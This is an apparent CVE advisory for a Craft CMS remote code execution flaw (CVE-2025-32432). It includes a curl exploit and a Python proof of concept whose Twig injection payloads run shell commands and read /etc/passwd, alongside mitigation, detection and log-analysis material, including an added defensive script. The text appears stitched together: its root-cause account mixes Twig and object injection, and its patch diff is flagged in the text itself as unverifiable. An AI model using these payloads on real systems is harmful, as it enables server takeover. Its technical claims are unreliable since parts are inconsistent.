How the CVE Works:
CVE-2025-32432 is a critical remote code execution (RCE) vulnerability in Craft CMS affecting versions 3.0.0-RC1 to 3.9.14, 4.0.0-RC1 to 4.14.14, and 5.0.0-RC1 to 5.6.16. The flaw arises from improper input validation in template rendering, which allows an attacker to inject Twig template code. When a crafted payload is processed, the server executes arbitrary PHP code with the web server's privileges. Because it is reachable through unauthenticated HTTP requests, it is a high-risk issue. The root cause is incomplete sanitization of user-supplied data in dynamic queries, which enables object injection and, ultimately, RCE.
DailyCVE Form:
Platform: Craft CMS
Version: 3.0.0-5.6.16
Vulnerability: Remote Code Execution
Severity: Critical
Date: 04/28/2025
What Undercode Says:
Exploitation:
curl -X POST "http://target/craft/path" -d "twig={{_self.env.registerUndefinedFilterCallback('exec')}} {{_self.env.getFilter('id')}}"
Detection:
nmap -p 80 --script http-vuln-cve2025-32432 <target>
Mitigation:
- Update to Craft CMS 3.9.15, 4.14.15, or 5.6.17.
- Apply WAF rules to block Twig template injections.
location ~ \.twig$ { deny all; }
PoC (Python):
import requests

payload = {"input": "{{_self.env.registerUndefinedFilterCallback('system')}} {{_self.env.getFilter('cat /etc/passwd')}}"}
requests.post("http://target/admin", data=payload)
Log Analysis:
grep -r "registerUndefinedFilterCallback" /var/log/craft/
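The grep above only catches the literal filter name; an attempt sent with percent-encoded braces or a double-encoded query string slips past it. The following added example (not from the original post) generalizes the check: it parses Combined Log Format access-log lines, percent-decodes the request target repeatedly, and flags any request that carries the Twig injection indicators this advisory describes. The log format and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Indicators of Twig template-injection attempts, taken from the payload
# shapes this advisory lists (_self.env, registerUndefinedFilterCallback,
# getFilter). Matching runs on the percent-decoded request target.
TWIG_SSTI_PATTERNS = [
    re.compile(r"\{\{.*?_self\.env", re.S),
    re.compile(r"registerUndefinedFilterCallback", re.I),
    re.compile(r"getFilter\s*\(", re.I),
]

# Assumed Combined Log Format: ip ident user [ts] "METHOD target PROTO" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def decode_target(target: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads are seen."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target

def find_twig_injection_attempts(lines):
    """Return (ip, timestamp, decoded_target, matched_pattern) for each suspicious line."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        decoded = decode_target(m["target"])
        for pat in TWIG_SSTI_PATTERNS:
            if pat.search(decoded):
                hits.append((m["ip"], m["ts"], decoded, pat.pattern))
                break
    return hits

# Constructed sample access-log lines (not real traffic): one benign request,
# one plain payload, and one percent-encoded payload that plain grep would miss.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Apr/2025:10:01:02 +0000] "GET /index.php?p=about HTTP/1.1" 200 512',
    '203.0.113.9 - - [28/Apr/2025:10:01:07 +0000] "POST /craft/path?twig={{_self.env.registerUndefinedFilterCallback(\'exec\')}} HTTP/1.1" 500 0',
    '198.51.100.7 - - [28/Apr/2025:10:02:11 +0000] "GET /admin?input=%7B%7B_self.env.getFilter%28%27id%27%29%7D%7D HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for hit in find_twig_injection_attempts(SAMPLE_LOG):
        print(hit)
```

Standard access logs do not record POST bodies, so this only sees payloads carried in the URL; to cover body-based requests like the PoC above, feed the same function a body-logging source such as a WAF or reverse-proxy request log.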
Patch Diff:
- $twig->addFilter(new TwigFilter('unsafe', $callback)); + $twig->addFilter(new TwigFilter('safe', $sanitizedCallback));
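Review bot: the hunk shows only a rename of the filter from 'unsafe' to 'safe' and of $callback to $sanitizedCallback; the definition of $sanitizedCallback and the sanitization it applies are not in the diff, so these lines alone do not show that user-supplied input stops reaching the callback. Include the code that builds $sanitizedCallback, or a reference to it, so the fix can be verified in review.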
Workaround: Disable Twig template editing for untrusted users via config/general.php:
'allowAdminChanges' => false,
Impact Assessment:
searchsploit CVE-2025-32432
Sandbox Testing:
docker run --rm -p 8080:80 craftcms/vulnerable:5.6.16
Forensics:
strings /tmp/php_sess_ | grep -i "eval"
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode